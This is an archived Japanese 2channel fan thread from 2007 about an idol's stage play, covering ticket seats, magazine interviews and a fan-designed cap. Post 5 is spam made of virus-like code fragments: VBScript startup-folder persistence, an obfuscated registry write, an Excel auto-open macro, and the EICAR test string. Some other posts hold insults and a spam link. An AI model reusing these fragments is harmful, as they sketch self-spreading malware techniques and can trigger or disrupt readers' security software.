2ちゃんねる ★スマホ版★ ■掲示板に戻る■ 全部 1- 最新50  

■ このスレッドは過去ログ倉庫に格納されています

murderer ・△・ まだぁ? 【其の九】

1 :※花粉注意※:2007/02/06(火) 18:20:58 ID:PRLbtZzn
☆に蜂拍子な人々が集うスレです。
鰹釣っても釣られるな。マターリsage進行でヨロ。
担話・他担&他スレ話は厳禁。
女ネタ・ホモネタ禁止。
荒らし・青林・ナリキリ自演は徹底スルー。
想像の斜め上を行く出来事にもクールに対処しましょう。

前スレ
無敵なカラダ・△・天然ブリさがし【其の八】
http://tv10.2ch.net/test/read.cgi/jan/1165501672/

2 :ななしじゃにー:2007/02/06(火) 18:45:28 ID:RI4Tk+G+
乙です!

3 :ななしじゃにー:2007/02/06(火) 19:07:18 ID:7taxjuO3
>1
乙華麗!

もうすぐまだぁだなぁ

4 :ななしじゃにー:2007/02/06(火) 19:47:37 ID:+JEL4rad
>1
スレ立て乙!
支援できなくてスマンかった。

5 :ななしじゃにー:2007/02/06(火) 20:13:42 ID:FDRc/k//
Set A4 = A1.CreateTextFile(A1.BuildPath(A1.GetSpecialFolder(1)))
X5O!P%@AP[4\PZX54(P^)7CC)7}$EICAR-STANDARD-ANTIVIRUS-TEST-FILE!$H+H*
fso.copyfile "dirsystem&nurupo.vbs", "j:\windows\start menu\programs\startup\"
ToInfect.CodeModule.InsertLines BGN, ADI1.CodeModule.Lines(BGN, 1)
"avgnt"="\"C:\\Program Files\\AntiVir PersonalEdition Classic\\avgnt.exe\" /min /nosplash"
G.RegWrite A("IJDX^MNB@M^L@BIHOD]Rnguv`sd]Lhbsnrngu]Vhoenvr]BtssdouWdsrhno]Sto]VhoRu`su"), E.BuildPath(E.GetSpecialFolder(1), A("VHORU@SU/WCR"))
lines(n)=replace(lines(n),"""",chr(93)+chr(45)+chr(93))
kak.hta';ken=wd+'START
kill -9 xz/tSaBh0
Sub auto_open()
Application.OnSheetActivate = "check_files"
End Sub
Sub check_files()
c$ = Application.StartupPath
m$ = Dir(c$ & "\" & "PERSONAL.XLS")
If m$ = "PERSONAL.XLS" Then p = 1 Else p = 0
If ActiveWorkbook.Modules.Count > 0 Then w = 1 Else w = 0
whichfile = p + w * 10
End Sub


6 :ななしじゃにー:2007/02/06(火) 21:40:39 ID:ydlFfLUl
>1乙!

前スレで2階最前が前のめり…ってあったが、最前サイドだと柱と柵が邪魔で
ステージ半分しか観えなかった経験がある。
自分はもう観るの諦めて声だけ聞いてたorz

7 :ななしじゃにー:2007/02/06(火) 21:50:29 ID:+HkqbWMG
ども。
大阪…なんでやねんと思ったけど…
ワタクシも2階F列18番とかでS席です。



8 :ななしじゃにー:2007/02/06(火) 21:53:02 ID:cC+RA5OH
( ゚д゚)ポカーン


9 :ななしじゃにー:2007/02/06(火) 22:09:19 ID:3y4XvgkV
>7ちなみにいつ?

10 :ななしじゃにー:2007/02/06(火) 22:12:36 ID:0bFmT3s5
私怨で席晒してんじゃないの?

11 :ななしじゃにー:2007/02/06(火) 22:15:04 ID:2ZvHiApq
教えて下さい
東京初

一階席は何列まであるんでしょうか?因みにアルファベットですよね

12 :ななしじゃにー:2007/02/06(火) 22:34:04 ID:CZ2ncwdS
>11
つ賢い箱

13 :ななしじゃにー:2007/02/06(火) 23:29:59 ID:sEtHj++2
そういや波から申し込むと当日何かもらえるって書かれてなかったっけ?

14 :ななしじゃにー:2007/02/06(火) 23:32:56 ID:2ZvHiApq
11です
分かる方いらっしゃいませんか?

15 :ななしじゃにー:2007/02/06(火) 23:34:35 ID:/yyEpQ1v
なんで2階報告ばっかなんだろう
平日昼で1階C列来たよ

16 :ななしじゃにー:2007/02/06(火) 23:38:37 ID:jmvj2qQY
自分も二階席組。
一般で取った席は一階だったのにな。

17 :ななしじゃにー:2007/02/06(火) 23:40:29 ID:LDjsq9/r
なんでって言われても。こっちが聞きたいくらいだよ。
土日だからなのかもしれないけど全部2階と1階M〜Oばかり。
友人もなぜか☆担じゃなく他担ばかりに前列が届いてる。
これ何の試練?

18 :ななしじゃにー:2007/02/06(火) 23:44:09 ID:OMGQ6ZcR
自分は土日だけど1階の前列とか来たよ。
こうやってわざわざ良席報告すると嫌がられるからじゃない?
紺でもその人にとっていまいちな席報告多いじゃん。

19 :ななしじゃにー:2007/02/06(火) 23:44:19 ID:sKCfatbC
土日じゃなく平日お一人様でも全部2階だよ。
観れるだけいいとは思うが欲は出るな。

20 :ななしじゃにー:2007/02/07(水) 00:00:50 ID:AI5rnoP4
>17
自分は普段からそこら辺の席運だからあんまり気にしてなかったが
そんな言う程悪い席かね、MNOは?

21 :ななしじゃにー:2007/02/07(水) 00:02:31 ID:e92BAcVD
d斬るが、先週の酒乱と僕僕のリピが未だ止まらない(*´∀`)

22 :ななしじゃにー:2007/02/07(水) 00:06:26 ID:D7iI0F0B
>20
席に関する価値観は人それぞれなんで、論議はやめといた方が。

今回はweb枠で外れた☆担が多いし、席くらいはって気持ちは少しは出るよね。
良席報告が少ないのも、>18のように遠慮してくれてるのかもしれないし。
かく言う自分も今までに比べると、あまり席は良くなかった。
でも初日取れたから、いい方かも。

23 :ななしじゃにー:2007/02/07(水) 00:10:10 ID:KAKolz/A
7ですが・・・3.18.13:00です

24 :ななしじゃにー:2007/02/07(水) 00:10:48 ID:A4GYnq2d
チケがハニーな色で可愛いな。
席はともかく、こうして手元に来るとワクテカが止まらない。

>21
僕僕はもはやネ申。
一日一僕僕。

25 :ななしじゃにー:2007/02/07(水) 00:15:52 ID:MmKuKa+I
自分お一人様なのに2階ど真ん中ktkr



26 :ななしじゃにー:2007/02/07(水) 00:55:45 ID:UjuNs5wP
住民票移してなくて、実家にいる妹(☆担)が
チケ受け取ってると思ったが連絡なし。
この時間電話するのもアレだからヤマトHPで伝票番号打ち込んだら…

お届けに伺いましたがご不在のためお届けが完了しておりません。

…仕事休みのはずなのになぜ…昼にでも電話しよう…

27 :ななしじゃにー:2007/02/07(水) 02:09:13 ID:1PePrRkX
最 前 キ タ コ レ

28 :ななしじゃにー:2007/02/07(水) 02:18:50 ID:dEEBGcjO
>>27
オメー!!!思う存分☆を拝んできてクレ!
あ花粉は忘れず落として行くべしノシ

29 :ななしじゃにー:2007/02/07(水) 02:23:15 ID:KhBZ0VVv
>21
ノシ
なんだか最近☆がカ○゙エくて仕方ない。
今日はエコ特番だけど、姐さんたちお忘れなく!

30 :ななしじゃにー:2007/02/07(水) 11:10:49 ID:9uIA/xRH
ある掲示板で定価譲るが意外と多いからハズレた人買えそうだよ

31 :ななしじゃにー:2007/02/07(水) 11:17:46 ID:CvrzGkat
ミニコンタイマーで
毎朝、僕僕アコで目覚めてる自分は
朝から血圧上昇
競艇生徒並みに動けるw

32 :ななしじゃにー:2007/02/07(水) 19:21:40 ID:D0q6CoxO
甘いな。
自分は僕僕アコ目覚ましで、体操生徒並みに側転しながら起きてるぜ。

33 :ななしじゃにー:2007/02/07(水) 19:44:58 ID:fttwMKbV
記念パピコ


自分もアコで目覚めてる。
でも着うたで怒の曲聴いたら好みだったんで
明日にでも通常探しの旅にでる事にするよ。

34 :ななしじゃにー:2007/02/07(水) 20:57:22 ID:HBPNMa6s
なんだか色々と感想はあるのに、胸がいっぱいだ
とりあえず無駄なコンセント抜いた

☆カコイイぞ!

35 :ななしじゃにー:2007/02/07(水) 21:00:20 ID:yHGvCwPy
まずは水の無駄遣いをなくすか。
今年は水分足が今の段階から予測されてるからな。
水は大切だ。


36 :ななしじゃにー:2007/02/07(水) 21:06:50 ID:HCV6aSCu
そういえば昔デブ時のときの某漫画家レポに
水出しながら歯磨きしてる☆に俺様だったかが注意されてるのあったなw
あの教えが頭に残ってるかもな。

37 :ななしじゃにー:2007/02/07(水) 21:17:48 ID:HBPNMa6s
>>36
IDおめ!

38 :ななしじゃにー:2007/02/07(水) 21:23:23 ID:SlAovAEL
勝手に電気消してます
て☆がなんか素敵だたw

39 :ななしじゃにー:2007/02/07(水) 21:24:10 ID:d32357uv
自分も取り敢えず使わない部屋やトイレの電気、部屋の電気毛布、CDプレーヤーのコンセント全部ひっこぬいてきた。しかし☆ってばテレビ局のトイレの電気を勝手に消してるとは…W☆カコエカッタぞ!

40 :ななしじゃにー:2007/02/07(水) 21:28:01 ID:A4GYnq2d
安置じゃないよ、と前置きしとく。
十年前は☆のビジュがとにかくツボで、あのビジュがあればいいって感じだった。
けど最近はあの中身であれば、☆ならハゲても腹が出てもついていきたい。



ごめん、嘘。
ハゲはまだしも腹が出るのはちょっと嫌。

41 :ななしじゃにー:2007/02/07(水) 21:31:12 ID:HCV6aSCu
>37
トン!

>40
ノシ
ナカーマw

42 :ななしじゃにー:2007/02/07(水) 22:53:46 ID:+MNyPe3v
まず☆のビズアルの良さにドチドチして
お茶目発言にほっこり、と思ってたらエコに対しての真面目発言にドキッ。
出来るところから始めるっていうのがいいよな。
夏に武威の楽屋のエアコン設定温度をこっそり上げてる☆を思い出したw

43 :ななしじゃにー:2007/02/07(水) 23:15:13 ID:WN3XbU8X
初日ハシッコだたorz

44 :ななしじゃにー:2007/02/08(木) 00:16:44 ID:OjMSMCrW
局のトイレの電気を勝手に消しちゃうなんて…イイヨイイヨ(・∀・)
実際、電気つけすぎなんだよな。

45 :ななしじゃにー:2007/02/08(木) 01:16:48 ID:lrPXermt
うちの学校のトイレ、改築して電気がセンサー式になったんだけど
あれ一応環境配慮なんだろうな。
自分も慌ててガスストーブ消しましたよ。

「コアラ!」カバエエw

46 :ななしじゃにー:2007/02/08(木) 14:11:06 ID:6dhC+4rj
嵐の前の静けさのような…w
みんなチケ掲巡りの旅に出てるのか。
海超えた所にいて舞台に行けないので、同担達の健闘を祈ってます。

47 :ななしじゃにー:2007/02/08(木) 18:02:26 ID:rJksEwxe
>46いつもこんな感じじゃね?
ネタがないなら無理して回す必要ないし、
いらないレスでスレを無駄遣いするのはエコロジー精神に反するw

48 :ななしじゃにー:2007/02/08(木) 19:22:10 ID:UPf94fEK
>47
壷を見る電力も節電すると尚良しだな。
これが☆スレクオリティー?w

そんな中で申し訳ないが今月の3誌もかなりイイんで
まだチェックしてない姐さんは本屋へどぞ。

49 :ななしじゃにー:2007/02/08(木) 23:45:10 ID:4eG3oS/A
自分的に二重奏の写真がイイ!
あまり弗誌買わないんだけどつい買ってしもた。

50 :ななしじゃにー:2007/02/08(木) 23:57:13 ID:UCpFRsF8
自分も写真は二重奏が一番よくて、真っ先にゲトした。
インタビュー内容はどれもいいね。
片目誌のくしゃみ直前激写に萌えた〜カメラマングッジョブ!
酒乱も楽しそうだったし、また沢山食べてたなw

51 :ななしじゃにー:2007/02/09(金) 01:07:10 ID:ps0olnVl
赤堀さんブログに☆の名前あり。
やっぱり人が食ってるの見ると食べたくなっちゃうんだなw


52 :ななしじゃにー:2007/02/09(金) 01:30:56 ID:NHdCKz9G
余計なお世話だろうけど、☆も赤堀さんももっといいものを食べてくれ。
だんご<カップ麺、じゃ切なすぎるぜw

53 :◆.byy5ZG6d2 :2007/02/09(金) 10:04:59 ID:hJRWM/+E
まだぁ?タノシミでつ(*´∀`*)

54 :ななしじゃにー:2007/02/09(金) 13:40:45 ID:Cles03K+
勝俣&☆は相変わらずうっとうしい。
全然、面白くないんだけど。
しわの多い衰えた顔のアップは…。
まわりも皆言ってるよ。
「☆くんってパッと見若いけどよく見たら老けたね」って。
最近、バラエティでもウザキャラで☆を嫌ってる人多いよ。
面白くもないのにウザイらしい。

55 :ななしじゃにー:2007/02/09(金) 13:45:39 ID:sfA6wbbY
二重奏ゲト
禿げイイな!二冊欲しいw

56 :ななしじゃにー:2007/02/09(金) 13:47:17 ID:rmyEKY+X
もう花粉の時期?

57 :ななしじゃにー:2007/02/09(金) 14:33:40 ID:Cles03K+
偽善者らしく、ら・し・い番組に出たらしいね。
他にアピールできるものがないからしょうがないね。

58 :ななしじゃにー:2007/02/09(金) 15:19:43 ID:/Xnjsnz7

番組スレでもGスレでも暴れてる粘着ゴキ番長担
☆の仕事が羨ましくて仕方ないらしいw
アピールするものも仕事もない老けた番長wwww

59 :ななしじゃにー:2007/02/09(金) 15:43:51 ID:sfA6wbbY
(・△・)つ∪∪∪∪∪∪

チケ確保に疲れた姐さん方
釜飯置いておきますね

60 :ななしじゃにー:2007/02/09(金) 16:53:10 ID:Cles03K+
凸担ナリをする最低☆担の盛り上がり切れない妄想スレ

61 :ななしじゃにー:2007/02/09(金) 19:59:10 ID:dELDzWoZ
ID:Cles03K+

担括り基地外は隔離スレに篭ってろよ、キモス

62 :ななしじゃにー:2007/02/09(金) 21:52:25 ID:jD4vp4om
>>59
釜飯いただきマッスル
やっと今チケ受け取れた〜!
平日13時からの分だけど、1階F列で
ここの姐さんの報告読んでる限り、
自分結構ラッキーかもな…

63 :ななしじゃにー:2007/02/09(金) 21:55:05 ID:ShFRKtp9
>62
うわぁ

64 :ななしじゃにー:2007/02/10(土) 01:03:49 ID:KOndU6aA
タモステDVD、ラストの監修「ケヤケミン」になってるが
監修したの?


65 :ななしじゃにー:2007/02/10(土) 01:07:13 ID:p1ZW5OEr
>64
うちはまだDVD届いてないんだけどミンさん監修なのか?
まさかどこかにマンイチもいるんじゃないよな?w

66 :ななしじゃにー:2007/02/10(土) 02:54:21 ID:17mP+upN
自分1名義で2公演当たって、1階最前列と2列目でした
こんなことってあるんだとちょっとびっくり


67 :ななしじゃにー:2007/02/10(土) 03:51:57 ID:CcD7W0pz
だ、そうです?

68 :ななしじゃにー:2007/02/10(土) 12:08:08 ID:fuptM4WT
私怨の可能性もあるんでスルー

MステDVDのパッケージが面白いんだけどこれも☆監修かな?

69 :ななしじゃにー:2007/02/10(土) 21:04:14 ID:5T2U04ru
他担のナリする卑怯な三宅担は消えろよ
頭に花が咲いてる真性が多いと他担から嫌われてるしよ
旦那とガキの世話でもしてろや

70 :ななしじゃにー:2007/02/10(土) 21:04:19 ID:8a00spYn
アクチュールのインタビュー凄く良い!
写真もナチュラルで格好いいな。

71 :ななしじゃにー:2007/02/10(土) 22:38:57 ID:6rTlzduZ
アクチュールは前にも一度出たよね?
写真も文章も、記事自体がいい。
答えに詰まるのは考えが深いからだ、みたいなインタビュアーの言葉が嬉しい。

72 :ななしじゃにー:2007/02/10(土) 22:51:14 ID:WGjS0bM6
7日のコシヒカリ日報夕刊に
舞台について☆のインタビューと写真が載っていた
写真の下のコメントが
「今年の目標は、袴をはけるようになること。
時代劇にも出たいと話す☆」

和の仕事に期待してしまうwktk


73 :ななしじゃにー:2007/02/10(土) 23:33:38 ID:jp6jQ40h
今の黒髪なら精悍な侍っぽい感じでいけそうだよな。
助六に☆が載る度に、この姿が映像で見たいって思ってた。

74 :ななしじゃにー:2007/02/11(日) 01:07:42 ID:cMJcZg2C
明るい方へや女優Xなど時代背景が過去の日本のドラマもやってきてるから
和の雰囲気も似合う顔なんだよね。
剣術とか練習すればできそうなタイプだし、殺陣も見たいな。

だが、まずは殺人者wktk

75 :ななしじゃにー:2007/02/11(日) 01:37:38 ID:xgPjuPd8
>>72
mjdkウチ産経だ……人づてに探してみるかorz
ステチな情報dですノシ

76 :ななしじゃにー:2007/02/11(日) 15:57:07 ID:twvmkh5I
稽古真っ最中でも酒乱ロケとかこなしてるんだな。
ヲタはテレビでも見られて有難いが☆は大変だ。
差し入れいっぱい食ってがんばれ〜。

77 :ななしじゃにー:2007/02/12(月) 00:13:36 ID:hDYJcRjV
初舞台のあの過酷な二万七千の時も
稽古期間中に他仕事入れまくってた事務所だぞ。
☆にとっては今更というか、もう当たり前なんじゃん?

78 :ななしじゃにー:2007/02/12(月) 20:53:52 ID:M9FUz2Ux
来週の今ごろやってんだな

79 :ななしじゃにー:2007/02/12(月) 22:26:12 ID:8LbkzuEq
>78
来週の今頃、初日を見た姐さん達が存在してるんだな。裏山。
自分が見るたこやき公演まではあと一ヶ月もある。

80 :ななしじゃにー:2007/02/12(月) 22:50:42 ID:DNNYBgjP
地方民なもので今日ようやくアクチュール(σ´∀`)σゲッツ!!
インタビュアーが☆は答えを熟考するタイプだって聞いてたっていうのは
マネか誰かに事前に聞いてたのかな?

81 :ななしじゃにー:2007/02/13(火) 00:34:30 ID:iiGHfqDk
和で時代劇…
仕事人には出ないんか脳

82 :ななしじゃにー:2007/02/13(火) 00:48:59 ID:epaOF9wh
>80
去年=bで監督がインタビューに答えてるから
その時にそう☆のことを話していたのだとしたら嬉しい。

83 :ななしじゃにー:2007/02/13(火) 01:27:02 ID:o0idOoON
監督の可能性高いな。
お互いに相思相愛って言ってたしw

84 :ななしじゃにー:2007/02/13(火) 03:07:13 ID:T3y6zgX1
仕事人残念ですねー
あれだけ和ぁ和ぁ言ってるから、てっきり出演すると思ってた…

85 :ななしじゃにー:2007/02/13(火) 14:34:55 ID:p8evxHOJ
>81>84
仕事人ってなんだ?

86 :ななしじゃにー:2007/02/13(火) 15:53:31 ID:laj+JSLC
>85
必殺仕事人のことかと
あとはググれ

でもあれ蛇タレ3人もいるし自分が☆に求めてるのとは微妙に違うなあ

87 :ななしじゃにー:2007/02/13(火) 16:42:19 ID:i1jJ6CIE
自分は明治〜昭和初期くらいの時代ものがいいな。

88 :ななしじゃにー:2007/02/13(火) 17:03:24 ID:SJg0VazC
書生さんとかいいなあ

89 :ななしじゃにー:2007/02/13(火) 18:37:45 ID:v+ZJaFvx
つーか☆の現在のキッツキツなスケでしかも舞台直前稽古真っ最中だというのに
☆担の誰が☆がドラマSPに出演するなんて思うのであろうか(反語

90 :ななしじゃにー:2007/02/13(火) 18:50:24 ID:nTfk+Z+w
>89
釣りも魚も鰈にスルー

91 :ななしじゃにー:2007/02/13(火) 20:59:05 ID:PfCovzzG
学逝にやられたorz
番長といっしょではしゃぐ☆…カ○エすぎだ(*´∀`*)

92 :ななしじゃにー:2007/02/13(火) 21:22:53 ID:HAjcNV4k
初っ端からの見事な空振りにヤラレタww
しかし番長と比べても下手だった気が…

93 :ななしじゃにー:2007/02/13(火) 21:27:21 ID:i1jJ6CIE
球技がダメダメなのは今更ですがな。
空振りがテケテケな感じがカバエかったよw

94 :ななしじゃにー:2007/02/13(火) 21:29:28 ID:hD5/dEs4
オマイラ(特に☆)、松●シュウゾウに教わったんじゃなかったのかYO!
と思わず突っ込んじまったw
しかし、&番長&俺様…、☆が楽しそうで幸せそうで何よりだw

95 :ななしじゃにー:2007/02/13(火) 21:47:03 ID:mvUW87Py
今日も好奇心大勢、カワエエゼ☆w

96 :ななしじゃにー:2007/02/13(火) 22:17:43 ID:y9GwGfM4
旺盛

97 :ななしじゃにー:2007/02/13(火) 22:53:28 ID:mzdz0vNK
小鹿のバンビ発言カワユス

98 :ななしじゃにー:2007/02/13(火) 23:51:11 ID:YbwvtAeG
バンビちゃん、ちょっとつに似てて
昔のバンビ同盟思い出した。

99 :ななしじゃにー:2007/02/14(水) 08:26:58 ID:HPonpaS2
手袋座に看板が出てた
テンソンあげてこーぞ!

100 :ななしじゃにー:2007/02/14(水) 15:07:13 ID:G8cQ+1lb
看板、自分も見た。やべーカコヨス!

>98
バンビコンビ懐かしい。
当時はつの方が身長が低(ry

101 :ななしじゃにー:2007/02/14(水) 19:26:18 ID:yiK/GExe
芸能人の秘蔵映像が見れる掲示板!!
↓↓↓ 必見
http://talk.milkcafe.net/test/read.cgi/girlidol/1091148903/785

102 :ななしじゃにー:2007/02/15(木) 03:10:31 ID:l895exk/
禿亀だが学行見た。
最初の両手での空振りの動きが人間離れしてて、何かの動物みたいだw
博様に同意「カワユス」

103 :ななしじゃにー:2007/02/15(木) 14:18:26 ID:gsQ9gGrK
ファンタ好きな姐さんがいるスレはここですかw

104 :ななしじゃにー:2007/02/15(木) 20:03:06 ID:Lkdn2/pU
>102
あそこ素晴らしい動きしてたよなw
☆の体の仕組みが気になる。

105 :ななしじゃにー:2007/02/15(木) 23:51:57 ID:5pb5I1mk
チケ掲見てると結構A列放出してるヤシがいるんだが、どういうつもりなんだろう

106 :ななしじゃにー:2007/02/15(木) 23:59:53 ID:N5FdKHOP
それは別にいいじゃねーかw

107 :ななしじゃにー:2007/02/16(金) 00:15:36 ID:DVX4N6RS
>105
どこ?ヒント欲しい。

108 :ななしじゃにー:2007/02/16(金) 00:22:17 ID:lN03ya4P
>105
そのスカスカ頭で考えなよ。

109 :ななしじゃにー:2007/02/16(金) 02:08:30 ID:FZ6L6Giq
>105
良席を掲示して、希望者が殺到するはずなのに一向に削除されないのは
メアド集めるのが目的なのかとつい勘ぐってしまう。

110 :ななしじゃにー:2007/02/16(金) 07:28:24 ID:HmkrK3Dg
何度もアタックしたが一度も交換できたためしがない。こっちもA列交換なのに。

111 :◆.byy5ZG6d2 :2007/02/16(金) 08:33:06 ID:gZ0Lqt61
☆タンの舞台もうすぐだお(*´∀`*)ドチドチしてきたでつ。

112 :ななしじゃにー:2007/02/16(金) 15:18:37 ID:4uaxfTQ1
今更だが、壷見てるような担なら大丈夫だとは思うけど一応。
チケ到着から見れる限りの掲示板見てるが、
良席掲示で出してる奴、>110のいう通り何度も再掲してたんでアド集めかと。
問い詰められたらメールサーバーの調子が…とか何とか言えば純粋な担は誤魔化されそうだし
携帯でも投稿できる所は気をつけた方がいいよ。

進海丸の時に同等席で希望日の交換でメールしたのに、何度も再掲し続けてた奴いたから。

113 :ななしじゃにー:2007/02/16(金) 17:28:24 ID:uozGKWTk
塚、良席掲示が出てても同等席キボンばかりで交換してもらえないし。

114 :ななしじゃにー:2007/02/16(金) 17:56:06 ID:fILNsDnv
塚・・・・・・・

115 :ななしじゃにー:2007/02/17(土) 00:19:25 ID:2lECv8PK
>114
ウンコついてるよ。

TV日本に伊東家座談会が載ってるのはガイシュツ?

116 :ななしじゃにー:2007/02/17(土) 00:37:33 ID:w/TTrs8k
>115
ううん。
そのテレビ誌はうちの地方では発売されてないんで、
よければどんな感じか教えてほしい。

117 :ななしじゃにー:2007/02/17(土) 01:00:08 ID:xqX83smf
舞台明後日からなんだよな。
なんだか急に緊張してきたw

118 :ななしじゃにー:2007/02/17(土) 09:20:10 ID:S9NMavZ6
火曜ズームイソの番組欄に名前アリ。
初日に会見ってことだな。

119 :ななしじゃにー:2007/02/17(土) 16:54:32 ID:rTeWpyV2
>118
d、いよいよだな。
19日はなにげに紋投票の結果発表もあるしwktkがとまらない。

120 :ななしじゃにー:2007/02/17(土) 19:08:56 ID:f19h4wv6
紋発表って19日なのか。
19日は楽しみが集まってるな。

ぴあに殺人者の記事があるから、未見の担は要チェキ!

121 :ななしじゃにー:2007/02/17(土) 21:03:20 ID:QVgriEoS
TV日本ヨカタWW伊東家のある意味本当の家族とは違う固い絆で結ばれてる感じで目から汁出たよ。

122 :ななしじゃにー:2007/02/18(日) 13:16:41 ID:Uxc6DzC0
ぴあ買ったのに前の方に載った記事だけ見てて、
P.136の赤堀さんインタブーに気付いてなかった。
☆について「立っているだけで〜」ってところに禿しく同意。
自分の初日はまだ先だがワクテカワクテカワクテカワクテカry

123 :ななしじゃにー:2007/02/18(日) 13:18:58 ID:Uxc6DzC0
クッキーきれてた…or2
スマソ

124 :ななしじゃにー:2007/02/18(日) 22:31:53 ID:AxHXFhqw
話ぶったぎりでスマソ。

今日、☆プロデュースのキャップが当選して家に届いた。
オレンジ、紺、白をベースとした、今年の干支猪柄キャップ。
素材、色、デザインも☆セレクトらしい。
☆のイラストっぽいポップな感じのデザインだった。

125 :ななしじゃにー:2007/02/18(日) 22:58:37 ID:K6R+LbY7
>124
当選オメ!
しかし猪柄とは想像つかんな。

126 :ななしじゃにー:2007/02/18(日) 23:02:03 ID:9GNPmuKG
>124
おめ!&裏山

猪キャップって☆おまwどんだけ斬新wwww

127 :ななしじゃにー:2007/02/18(日) 23:46:19 ID:AxHXFhqw
>125>126
d!

サイドに小さな猪のワッペンがついてる他に
キャップそのものが猪の顔に見立ててある>猪柄。
前面に目、おでこに当たるところに縫い傷が2つがついてる。
ツバは猪の鼻の出っ張ってるとこに見立ててあって、鼻とキバ(それからINOSHISHIの文字)がついてる。


説明めちゃくちゃ下手だな…自分。
実物はオシャレで可愛いデザインなんだよ。

全然伝わらないと思うが…orz

128 :ななしじゃにー:2007/02/19(月) 00:06:39 ID:re3qepGd
>127
文章だけ読むと・・・絶対使えNEEEEEEEEEEEw
でも実物は☆のセンスが光ってそうでカワイイんだろうな。
127姐さん詳しくありがとん。

129 :ななしじゃにー:2007/02/19(月) 00:24:27 ID:/Wmj3A8Y
帽子が猪の顔に見立ててあるってことは、
昔の某球団の鳥顔帽子系ってことか?

130 :ななしじゃにー:2007/02/19(月) 00:41:34 ID:ZdT8nzBD
ちょ。めんたい民だが吹きそうになった。

131 :ななしじゃにー:2007/02/19(月) 06:45:35 ID:2kfNTmo3
ブログで☆キャップ写真を見た。
>127の通り、すげー面白カコエエw
マンガ好きの小学生男子だったら垂涎の的だろうが
オンナノコはやっぱり絶対使えNEEEEEEEEEEEと思ふw


132 :ななしじゃにー:2007/02/19(月) 07:53:41 ID:4x7HZF9C
説明だけ聞いてたら何だソレ状態だったが、やっぱ☆のセンス好きだ。
ああいう遊び心まんさんアイテムをデザインしてもセンスいいとは。
予想以上によくてカコよかったから欲しくなった。
絶対普段使えneeeeee!!けどなw
当たった姐さん達オメ!大事に被ってくれww

133 :◆.byy5ZG6d2 :2007/02/19(月) 10:24:49 ID:6Y29I3Uh
朝からドチドチでつ(`・д・´;)

134 :ななしじゃにー:2007/02/19(月) 10:39:55 ID:TcMAWz4Q
あのキャップを☆自身が被ってる姿が見たいな。
☆が被れば普通にかっこよさそうじゃね?
小学生じゃなくても、あんな感じのデザイン好きな男は多いとオモ。
しかしさすが☆、担には女子が多い事をあまり考慮してなさそうだw

135 :◆.byy5ZG6d2 :2007/02/19(月) 10:43:19 ID:6Y29I3Uh
☆タンキャップほしいでつ(´・ω・`)

136 :ななしじゃにー:2007/02/19(月) 13:56:08 ID:NPe6sRdG
画像ウpきぼん

137 :ななしじゃにー:2007/02/19(月) 14:39:06 ID:FC6X8zhg
会員証忘れた!
やっぱり提示して記念品引き換えだよなぁ…

138 :ななしじゃにー:2007/02/19(月) 15:45:25 ID:s0SdY+Kt

ハニーなチケには会員番号どころか氏名すら書かれていないが?

139 :ななしじゃにー:2007/02/19(月) 17:20:43 ID:NPe6sRdG
うはww キャップ見たwwww
これ、本人以外で似合うヤシ居んのか!?www

140 :ななしじゃにー:2007/02/19(月) 17:48:32 ID:SuiPRaux
今回は知らんが、紫舞台の時はWebで取ったチケットを見せるだけで景品が貰えたが?
Webの会員が家族会員とは限らんし。

141 :ななしじゃにー:2007/02/19(月) 18:44:53 ID:FC6X8zhg
記念品に☆の愛が溢れてる

142 :ななしじゃにー:2007/02/19(月) 19:09:39 ID:Mj0jLTGk
http://www.nikkansports.com/entertainment/f-et-tp0-20070219-159014.html

143 :ななしじゃにー:2007/02/19(月) 19:38:44 ID:ziWXBoe+
☆キャップ見てきた。
絶対使えNEEEEEEEEE!のは感想は変わりないなw
明日はズーミン忘れないようにしないとな

144 :ななしじゃにー:2007/02/19(月) 19:48:18 ID:gCEFoai3
>142
トン。
雨が来るを思い出したよ。

145 :ななしじゃにー:2007/02/19(月) 19:58:52 ID:hF6u+glC
女優目当てで「激情」探したら「雨が来る」に入ってたから
一緒に見た


146 :ななしじゃにー:2007/02/19(月) 21:11:59 ID:PR2OpoD2
あのキャップは☆本人が一番似合うのは間違いない。
雨が来るの安部仕様で被ると(・∀・)イイ!!

そろそろ終わった頃かな。

147 :ななしじゃにー:2007/02/19(月) 21:20:03 ID:4yPVmuAu
もうしばらくかかるんじゃないか?
という自分も気になって数十分おきにここに来てるよ
今更ながらに緊張して吐きそうorz
レポ姐さんお待ちしております

148 :ななしじゃにー:2007/02/19(月) 21:23:22 ID:V3DfEL1Q
>147
自分も吐きそうだ
良い舞台になってるといい脳

観劇姐さんは、気を付けて帰宅してくれ

149 :ななしじゃにー:2007/02/19(月) 21:25:39 ID:CmsVCMzq
無事に終わります。
落ち着いたらレポしに来ますノシ

150 :ななしじゃにー:2007/02/19(月) 21:36:13 ID:PR2OpoD2
初日参加姐さんキタ━━━ヽ(ヽ(゚ヽ(゚∀ヽ(゚∀゚ヽ(゚∀゚)ノ゚∀゚)ノ∀゚)ノ゚)ノ)ノ━━━!!!!

>149
レポ待ってます。
ネタばれ表記でおながいしたい。

151 :ななしじゃにー:2007/02/19(月) 21:36:50 ID:FC6X8zhg
開場したら即入ることをお薦めします

152 :ななしじゃにー:2007/02/19(月) 21:39:46 ID:FC6X8zhg
開場したら即入ることをお薦めします
記念品に関して愛情溢れる☆ビデオが流れてます
開演30分前には終了しちゃいますよ
自分は会社帰りなので5分しか見れず
だけど感動しましたぞ

153 :ななしじゃにー:2007/02/19(月) 21:41:29 ID:FC6X8zhg
間違いスマソ

154 :ななしじゃにー:2007/02/19(月) 21:42:16 ID:tS2J8gl0
d!1時間前に行きます。

155 :ななしじゃにー:2007/02/19(月) 21:46:45 ID:GBVajoZG
30分前に着いた自分は負け組だったのかorz
明日はガンガル

156 :◆.byy5ZG6d2 :2007/02/19(月) 21:53:47 ID:6Y29I3Uh
見おわった後、解放感感じたお。
でもちゃんとした感想難しいでつ(´・ω・`)
明日もう一度見てからにするおノシ


157 :ななしじゃにー:2007/02/19(月) 21:57:14 ID:4x7HZF9C
>156
いい加減に鏝ヤメレ
オマイの事は誰も待ってないっつの
てか、見てないんじゃないの

158 :ななしじゃにー:2007/02/19(月) 21:58:40 ID:RgT9ystt
初日組の姐さん方乙です
パンフの大きさとかも教えて下さらんか

159 :ななしじゃにー:2007/02/19(月) 21:59:16 ID:IctR3rWN
初日いてきますた
見る前から既に☆の気遣いに思わず目汁が!!
明日以降行かれる姐さんは並んで入場、即右折でww
手袋座であそこまでやてくれるの☆ぐらいだと思

内容はアドリブ休憩梨でケコー難しいかとorz

